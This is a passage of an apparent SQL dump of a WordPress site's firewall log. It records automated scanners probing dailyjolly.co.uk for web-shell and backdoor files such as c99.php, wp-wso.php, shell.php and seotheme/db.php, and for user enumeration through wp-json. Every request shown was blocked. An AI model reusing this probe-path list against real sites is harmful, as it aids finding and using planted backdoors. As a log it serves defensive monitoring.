Safari\\/537.36\"}','Qp3R7MJUBGwSebNOZLxVlKzH',0,1674231167.1921,229,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ozsr6UHYf1GcxiwCQJyFqSdX',0,1674231203.9584,198,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Dezb0SjZ1BGnCARt8m5kLiVh',0,1674231239.8835,223,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NeHLd6rgvuR1hMUGY7kDal2O',0,1674231501.6220,201,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','B0TELuFeIV3XiwKRcqDMYmPn',0,1674231575.2543,390,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/ohayo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','z9j46eSaMRs7BDbwmnc8WyC0',0,1674231647.8415,203,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pz3XZr2UQ7DvMJAnqxi1gLlR',0,1674231721.5772,198,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GMbDpnazkdLZHTF5fhuiC49Q',0,1674231759.0069,210,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-content/wp-logins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6ULxZ5vnequmIA3h9iSC7lJd',0,1674231759.4179,214,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','A96y21ZDaJUlRsWtMr7QvPYz',0,1674231759.8070,205,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PmdqEB3nJSRMbIVx6QATf2uL',0,1674231795.9922,185,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3g4SOtUTvDIKpFfRZyeXba6Y',0,1674231830.0976,198,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-content/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nZ7TOuchV3kwXQ8DryStb1ps',0,1674231864.9840,202,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bCQng7vL6GMx18iX3jAJ9drp',0,1674231934.8012,291,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bOYMPBxeqokDrTVWXcpgQ5AZ',0,1674232006.5730,224,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VhOBmG1gL8Mb7NoX5yiKcknj',0,1674232042.5956,185,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7fJr1EzjIBK2Q0ZalmFeLhUc',0,1674232077.9848,200,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','83U1vuTX9PR4bkys2xGoKe0F',0,1674232150.0590,233,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9xUgOHp6mZkveVXr1A2Ttu8C',0,1674232222.0709,198,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sai6mTLuxCItfXZGqhcdQb31',0,1674232259.7513,165,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Zz1niPGAce0gCMH8t6RrK9q2',0,1674232431.9734,219,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','c1XghzxiaQeAOtkqrwBVm2T0',0,1674232469.0610,194,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/cms.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oLaC2qMnjGEl3ysX5fg6OxcQ',0,1674232608.9948,228,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MH8hRa279CrcwfYW05BsAIT4',0,1674232643.8328,183,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eZ8gk5Jao46GzKsYivN9EFmr',0,1674232724.9363,232,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Nz8tIGvwSE0jCVqbYFfZUDAd',0,1674232796.9262,225,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/Gel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4ACjE0zsoc1Y3KhdgJyMXfvQ',0,1674232869.2473,208,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lKnJm9oGF26RtgP35MsCkrZy',0,1674232940.1638,199,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5RX4Gb6H9MrDfNwEuTi1BZos',0,1674233015.5573,194,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','beCMvqHW7OlTKfQoZzaUXxhc',0,1674233086.7476,215,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/41.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dOA19YsWeP3i8KkqmINwp60E',0,1674233159.4676,284,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LvSlCieKyRXGt9P1uO7Ek5nH',0,1674233266.1311,207,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lLgodE5ap0HWehsJ7nmtr1CF',0,1674233334.2201,234,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/MARIJUANA.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JnV2eChrLZD1XazORU3kN6sE',0,1674233403.5508,207,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','C3OM8Ag0ikuLxESQfbq9PB4s',0,1674233403.9299,175,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Lszen0i9bkR2NqhoAEd5yKuM',0,1674233475.7089,190,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/.fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1yn3dcYApPELRiTzMbgF8S6q',0,1674233508.9308,193,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MCGi123kZrwPaQnczOJ4mjI5',0,1674233544.4715,283,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Y5AjIThMCr1aEbt3q0yOFJH6',0,1674233715.9786,205,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RNMy5rSbOZVYe7kI496aTCtl',0,1674233750.1766,190,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MvJAcbiIWo97zeN1K3Qp0sBt',0,1674233785.7419,209,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NLZ4TX6WFCuUErS9K153ft0Y',0,1674233786.1482,178,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kMFuyELlYaX40D2v5KQVzTIm',0,1674233857.9142,203,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','52TctuA8UPRCFpOBhs1wEIjS',0,1674233892.6899,213,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','V05E63cK2zdGMtYsjDNehZb1',0,1674233928.5801,278,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','r6l7XD5OThx4ucNRInFdq0AL',0,1674234105.7596,207,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','R3YuAZ1yJFcKopUkvXigD4Lw',0,1674234140.6732,192,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yABnoW4PwqkUrxfE1hQmzDge',0,1674234245.0413,206,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','omEwdYyHWb8MiT9n5tr2PZgC',0,1674234280.5950,187,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rags1c5pQFjdLoZzBWMDhlne',0,1674234427.8155,209,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hNtgemfyPGW0842EXQn5zrHU',0,1674234499.2782,193,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','J6x78MR9YTI1mnBCWuKgF5Dh',0,1674234536.3991,233,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','I16Wrxp3RlTVjfneyaYiN74K',0,1674234606.0102,238,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','V1G2g04LF75HncIURkCK9tjm',0,1674234681.0006,246,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AqSWwcKQD4BEHrgvP9T7l0zJ',0,1674234715.9813,226,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QjHfVPGkxCWgbDUqvpJh3oem',0,1674234716.4079,190,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Z12FCif9gSbAXJLrUTMW0IYj',0,1674234754.5963,275,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/sh3ll.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JtawFLVjbuECp5zv2SBmyI3W',0,1674234790.8982,215,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KDeOJIH6U08BliCgLpSoNt3y',0,1674234828.2673,235,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/alexuse.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4JOEv2LdflPZbmG5Cko8FRtU',0,1674234901.0879,248,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1MfBFaZR2JyskHY5469lujL7',0,1674234975.8328,266,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sR0IyQwCWmDi9NG1Vg85qYhJ',0,1674235050.7684,439,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','avB8WZmb1iUrLgSXFJzRPdkH',0,1674235165.2228,247,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nwp0J4oafkUIercSOB39gMmH',0,1674235200.8575,220,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xHkg32yAlT4fuqM1e7n6IGNj',0,1674235310.1606,199,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qAKxoPRQrhGbsXFlyICag7dS',0,1674235423.2482,207,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-content/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IQslhnH8c5o0tduBbqLg9rpv',0,1674235571.4480,226,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Hdcin3jJPUCgGZ1krfBF9QWx',0,1674235606.4100,187,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Y8BCXgSrGcajUbEQT2Pzdpnk',0,1674235642.7159,204,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rlk5xMvoBt8n6qN2dmiHaGCL',0,1674235715.2576,269,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/wp-content/plugins/xwp/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VW9KcTyuDMF3mAxpQ2nEeSPt',0,1674235893.7500,205,'','GET',403,0,700,0,1,'',0),('20.84.48.39',341061671,'','https://dailyjolly.co.uk/cpanel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1t7QOHubAPEVpRN5Wo4Mf3rv',0,1674235932.0829,187,'','GET',403,0,700,0,1,'',0),('213.189.216.162',3585988770,'','https://www.dailyjolly.co.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','QonvpxVfklDjbE9ty2UhKiOH',0,1674256368.1271,201,'','GET',403,0,700,0,1,'',0),('128.199.153.103',2160564583,'','https://www.dailyjolly.co.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','POdV5gcCwFzah7WExpLBy92f',0,1674279365.0348,298,'','GET',403,0,700,0,1,'',0),('128.199.153.103',2160564583,'','https://www.dailyjolly.co.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','xAwrE8ZWgeiJn69cUb4dNmLD',0,1674279365.2381,188,'','GET',403,0,700,0,1,'',0),('43.130.154.185',729979577,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/db.php?u\"}','1ponHbrEW2GBQqLUOMeR70XI',0,1674285985.1428,2716,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"python-requests\\/2.28.1\"}','j6tQvkSoIG1NaU4wJf5PCMRb',0,1674293183.5699,261,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/theme/seotheme/db.php?u','','{\"1\":\"python-requests\\/2.28.1\"}','VUpTZbRKg7dnxaz51hEuQM6I',0,1674293184.6140,176,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"python-requests\\/2.28.1\"}','nk7JE94SiypC1ju2KA0UGzcH',0,1674293185.5782,196,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','9luVJ1FsbnvRikKzmNxdOo7Z',0,1674293187.4831,198,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','uN5n9x3IG1JRyp2awFMeUZcS',0,1674293188.4882,258,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-json/','','{\"1\":\"python-requests\\/2.28.1\"}','40R7hdIOPW8toE9KUkaMilVe',0,1674293291.1663,199,'','GET',403,0,520,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-json/wp/v2/users/','','{\"1\":\"python-requests\\/2.28.1\"}','xunaBdzgU4J7MbLOqyTV5wZD',0,1674293402.2486,257,'','GET',403,0,520,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/db.php?u','','{\"1\":\"python-requests\\/2.28.1\"}','ZIvnCsAtGzLgT94NcYKu8V6i',0,1674293431.7285,160,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/index.php','','{\"1\":\"python-requests\\/2.28.1\"}','ldEKDg8BNzbMT957S